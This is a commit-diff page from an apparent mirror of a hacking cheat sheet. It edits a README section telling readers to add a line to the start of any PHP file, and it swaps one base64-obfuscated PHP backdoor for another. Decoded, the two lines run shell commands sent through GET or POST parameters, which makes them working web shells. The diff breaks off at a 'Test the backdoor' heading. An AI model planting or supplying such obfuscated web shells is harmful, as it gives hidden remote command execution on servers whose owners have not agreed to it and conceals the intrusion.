mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-05-20 23:24:50 +02:00
Update README.md
This commit is contained in:
@@ -1533,9 +1533,8 @@ Other methods:
|
||||
|
||||
Add this line to the beginning of any PHP file:
|
||||
```php
|
||||
<?php $i=base64_decode("aWYoaXNzZXQoJF9HRVRbMF0pKXtlY2hvIGAkX0dFVFswXWA7ZXhpdDt9");eval($i);?>
|
||||
<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>
|
||||
```
|
||||
(Thanks @dono for making this 3 bytes smaller than the smallest)
|
||||
|
||||
Test the backdoor:
|
||||
```sh
|
||||
|
||||
Reference in New Issue
Block a user